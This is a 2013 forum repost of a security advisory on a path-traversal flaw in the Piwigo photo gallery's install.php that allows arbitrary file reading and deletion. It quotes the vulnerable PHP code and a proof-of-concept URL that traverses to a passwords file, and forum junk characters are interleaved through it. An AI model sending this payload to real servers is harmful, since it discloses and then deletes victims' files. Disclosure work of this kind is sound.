找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Piwigo任意文件泄露和任意文件删除漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2244|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。
3 o# n/ Q7 u( S: |/ \
9 X1 h" {0 V7 m; a, fPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。# ?3 W/ ]% j  Y9 s. y
====================================================================% S" X5 z$ p3 y% n6 r
/install.php:
$ r; H- o' Z/ w8 j" G* ]# d-------------. r( x+ Y1 @4 `8 L
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
. y6 B" A# T' ~& p: i4 |* I114: {) y4 W( [) x+ v* M
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];4 r: q4 C' t0 @' q! b% }; r
116:   header('Cache-Control: no-cache, must-revalidate');5 h8 `( R- o- p1 ?" ~$ J- ^$ @% ]
117:   header('Pragma: no-cache');) p- R2 G4 O. f
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
; C7 R4 a7 H# h+ V- f& M+ }, X119:   header('Content-Transfer-Encoding: binary');
8 x7 ^; g. N9 l3 q+ Y120:   header('Content-Length: '.filesize($filename));
9 H: E' N& H  x$ U! q) x+ G121:   echo file_get_contents($filename);0 g7 y/ A$ h3 ^( \( H$ ?
122:   unlink($filename);" {5 C' r; B; g* i) S. P# l
123:   exit();
* _: [- h: T2 K3 B$ m  P# K124: }
3 A2 d! o% s0 V" @' F+ O8 n====================================================================) N% v% m! d9 x* E# Z4 q9 R
3 \& z; u. q/ ~
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
, D+ \: N; }8 [/ u7 I5 t2 q8 i: F           Apache 2.4.2 (Win32)5 \2 H' ?/ o2 x+ q- L
           PHP 5.4.4! ~& l0 ^' k: }8 `: `: c
           MySQL 5.5.25a& i3 o. u9 ^) Z: X: g
1 c# f8 C' ?6 u( M
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic$ Y( T' U7 {, B; p' K! |
                            @zeroscience: y  u' `0 j  a+ M# O  l

" Z# n% \# c- K7 u8 mAdvisory ID: ZSL-2013-5127
0 G$ M( {! I7 q" p' z9 i$ B+ ?7 cAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php- z+ w$ d) F" m: Q
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
1 g+ y7 i" N1 M; Y: O. ] ( l8 K7 ~4 o/ d' D0 i
15.02.2013
( P7 a* p' c0 r: `1 v% R
0 D$ x9 M. T9 ?/ Z9 a" C( Z0 p1 r--9 p8 L1 H2 K" W% K) j( {8 {
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
1 H! m! x4 m* S9 x' E3 f! @7 [; s& x ' [4 X9 z: |. k, b% ]3 z, [( x) n
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表